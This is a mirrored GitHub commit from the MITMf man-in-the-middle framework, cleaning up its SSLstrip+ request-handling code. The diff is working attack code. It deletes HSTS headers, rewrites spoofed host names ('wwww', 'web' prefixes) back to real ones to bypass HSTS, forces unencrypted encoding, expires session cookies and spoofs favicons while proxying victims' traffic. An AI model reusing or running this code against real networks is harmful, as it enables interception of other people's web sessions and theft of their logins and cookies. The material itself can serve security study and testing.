mirror of
https://github.com/byt3bl33d3r/MITMf.git
synced 2025-07-16 10:03:52 -07:00
- Cleaned up the SSLstrip+ code (somewhat)
- ServerConnection now properly detects and removes HSTS headers - Fixed debug output
This commit is contained in:
byt3bl33d3r
parent
c85fd2b5f3
commit
2200edcf5e
6 changed files with 76 additions and 131 deletions
|
|
@ -57,14 +57,13 @@ class ClientRequest(Request):
|
|||
def cleanHeaders(self):
|
||||
headers = self.getAllHeaders().copy()
|
||||
|
||||
#for k,v in headers.items():
|
||||
# logging.debug("[ClientRequest] Receiving headers: (%s => %s)" % (k, v))
|
||||
|
||||
if 'accept-encoding' in headers:
|
||||
headers['accept-encoding'] == 'identity'
|
||||
logging.debug("Zapped encoding")
|
||||
|
||||
if 'strict-transport-security' in headers: #kill new hsts requests
|
||||
del headers['strict-transport-security']
|
||||
logging.info("Zapped HSTS header")
|
||||
|
||||
if 'if-modified-since' in headers:
|
||||
del headers['if-modified-since']
|
||||
|
||||
|
|
@ -80,13 +79,16 @@ class ClientRequest(Request):
|
|||
if len(real) > 0:
|
||||
dregex = re.compile("(%s)" % "|".join(map(re.escape, real.keys())))
|
||||
headers['referer'] = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), headers['referer'])
|
||||
|
||||
|
||||
if 'host' in headers:
|
||||
host = self.urlMonitor.URLgetRealHost("%s" % headers['host'])
|
||||
logging.debug("Modifing HOST header: %s -> %s" % (headers['host'],host))
|
||||
headers['host'] = host
|
||||
headers['securelink'] = '1'
|
||||
self.setHeader('Host',host)
|
||||
host = self.urlMonitor.URLgetRealHost(headers['host'])
|
||||
if host[1] is True:
|
||||
logging.debug("[ClientRequest][HSTS] Modifing HOST header: %s -> %s" % (headers['host'],host[0]))
|
||||
headers['host'] = host[0]
|
||||
headers['securelink'] = '1'
|
||||
self.setHeader('Host',host[0])
|
||||
else:
|
||||
logging.debug("[ClientRequest][HSTS] Passed on HOST header: %s " % headers['host'])
|
||||
|
||||
self.plugins.hook()
|
||||
|
||||
|
|
@ -116,18 +118,14 @@ class ClientRequest(Request):
|
|||
headers = self.cleanHeaders()
|
||||
client = self.getClientIP()
|
||||
path = self.getPathFromUri()
|
||||
url = 'http://' + host + path
|
||||
self.uri = url # set URI to absolute
|
||||
|
||||
try:
|
||||
if self.content:
|
||||
self.content.seek(0,0)
|
||||
postData = self.content.read()
|
||||
except:
|
||||
pass
|
||||
postData = self.content.read()
|
||||
|
||||
if self.hsts:
|
||||
|
||||
#Original code from SSLstrip+
|
||||
#Saying that this is unreadible is an understatement
|
||||
#KILL IT WITH FIRE!!
|
||||
|
||||
real = self.urlMonitor.real
|
||||
patchDict = self.urlMonitor.patchDict
|
||||
|
|
@ -136,67 +134,41 @@ class ClientRequest(Request):
|
|||
dregex = re.compile("(%s)" % "|".join(map(re.escape, real.keys())))
|
||||
path = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), path)
|
||||
postData = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), postData)
|
||||
if len(patchDict)>0:
|
||||
|
||||
if len(patchDict) > 0:
|
||||
dregex = re.compile("(%s)" % "|".join(map(re.escape, patchDict.keys())))
|
||||
postData = dregex.sub(lambda x: str(patchDict[x.string[x.start() :x.end()]]), postData)
|
||||
|
||||
url = 'http://' + host + path
|
||||
|
||||
headers['content-length'] = "%d" % len(postData)
|
||||
|
||||
#self.dnsCache.cacheResolution(host, address)
|
||||
hostparts = host.split(':')
|
||||
self.dnsCache.cacheResolution(hostparts[0], address)
|
||||
#self.dnsCache.cacheResolution(host, address)
|
||||
hostparts = host.split(':')
|
||||
self.dnsCache.cacheResolution(hostparts[0], address)
|
||||
|
||||
if (not self.cookieCleaner.isClean(self.method, client, host, headers)):
|
||||
logging.debug("Sending expired cookies...")
|
||||
self.sendExpiredCookies(host, path, self.cookieCleaner.getExpireHeaders(self.method, client,
|
||||
host, headers, path))
|
||||
elif (self.urlMonitor.isSecureFavicon(client, path)):
|
||||
logging.debug("Sending spoofed favicon response...")
|
||||
self.sendSpoofedFaviconResponse()
|
||||
elif (self.urlMonitor.isSecureLink(client, url) or ('securelink' in headers)):
|
||||
if 'securelink' in headers:
|
||||
del headers['securelink']
|
||||
logging.debug("LEO Sending request via SSL...(%s %s)"%(client,url))
|
||||
self.proxyViaSSL(address, self.method, path, postData, headers,
|
||||
self.urlMonitor.getSecurePort(client, url))
|
||||
else:
|
||||
logging.debug("LEO Sending request via HTTP...")
|
||||
#self.proxyViaHTTP(address, self.method, path, postData, headers)
|
||||
port = 80
|
||||
if len(hostparts) > 1:
|
||||
port = int(hostparts[1])
|
||||
if (not self.cookieCleaner.isClean(self.method, client, host, headers)):
|
||||
logging.debug("Sending expired cookies...")
|
||||
self.sendExpiredCookies(host, path, self.cookieCleaner.getExpireHeaders(self.method, client, host, headers, path))
|
||||
|
||||
elif (self.urlMonitor.isSecureFavicon(client, path)):
|
||||
logging.debug("Sending spoofed favicon response...")
|
||||
self.sendSpoofedFaviconResponse()
|
||||
|
||||
self.proxyViaHTTP(address, self.method, path, postData, headers, port)
|
||||
elif (self.urlMonitor.isSecureLink(client, url) or ('securelink' in headers)):
|
||||
if 'securelink' in headers:
|
||||
del headers['securelink']
|
||||
|
||||
logging.debug("Sending request via SSL...(%s %s)" % (client,url))
|
||||
self.proxyViaSSL(address, self.method, path, postData, headers, self.urlMonitor.getSecurePort(client, url))
|
||||
|
||||
else:
|
||||
|
||||
url = 'http://' + host + path
|
||||
self.uri = url # set URI to absolute
|
||||
logging.debug("Sending request via HTTP...")
|
||||
#self.proxyViaHTTP(address, self.method, path, postData, headers)
|
||||
port = 80
|
||||
if len(hostparts) > 1:
|
||||
port = int(hostparts[1])
|
||||
|
||||
#self.dnsCache.cacheResolution(host, address)
|
||||
hostparts = host.split(':')
|
||||
self.dnsCache.cacheResolution(hostparts[0], address)
|
||||
|
||||
if (not self.cookieCleaner.isClean(self.method, client, host, headers)):
|
||||
logging.debug("Sending expired cookies...")
|
||||
self.sendExpiredCookies(host, path, self.cookieCleaner.getExpireHeaders(self.method, client,
|
||||
host, headers, path))
|
||||
elif (self.urlMonitor.isSecureFavicon(client, path)):
|
||||
logging.debug("Sending spoofed favicon response...")
|
||||
self.sendSpoofedFaviconResponse()
|
||||
elif (self.urlMonitor.isSecureLink(client, url)):
|
||||
logging.debug("Sending request via SSL...")
|
||||
self.proxyViaSSL(address, self.method, path, postData, headers,
|
||||
self.urlMonitor.getSecurePort(client, url))
|
||||
else:
|
||||
logging.debug("Sending request via HTTP...")
|
||||
#self.proxyViaHTTP(address, self.method, path, postData, headers)
|
||||
port = 80
|
||||
if len(hostparts) > 1:
|
||||
port = int(hostparts[1])
|
||||
|
||||
self.proxyViaHTTP(address, self.method, path, postData, headers, port)
|
||||
self.proxyViaHTTP(address, self.method, path, postData, headers, port)
|
||||
|
||||
def handleHostResolvedError(self, error):
|
||||
logging.warning("Host resolution error: " + str(error))
|
||||
|
|
@ -223,13 +195,13 @@ class ClientRequest(Request):
|
|||
real = self.urlMonitor.real
|
||||
|
||||
if 'wwww' in host:
|
||||
logging.debug("Resolving %s for HSTS bypass (Twisted)" % (host))
|
||||
logging.info("%s Resolving %s for HSTS bypass (Twisted)" % (self.getClientIP(), host))
|
||||
host = host[1:]
|
||||
elif 'web' in host:
|
||||
logging.debug("Resolving %s for HSTS bypass (Twisted)" % (host))
|
||||
logging.info("%s Resolving %s for HSTS bypass (Twisted)" % (self.getClientIP(), host))
|
||||
host = host[3:]
|
||||
elif host in real:
|
||||
logging.debug("Resolving %s for HSTS bypass (Twisted)" % (host))
|
||||
logging.info("%s Resolving %s for HSTS bypass (Twisted)" % (self.getClientIP(), host))
|
||||
host = real[host]
|
||||
|
||||
hostparts = host.split(':')
|
||||
|
|
|
|||
Loading…
Add table
Add a link
Reference in a new issue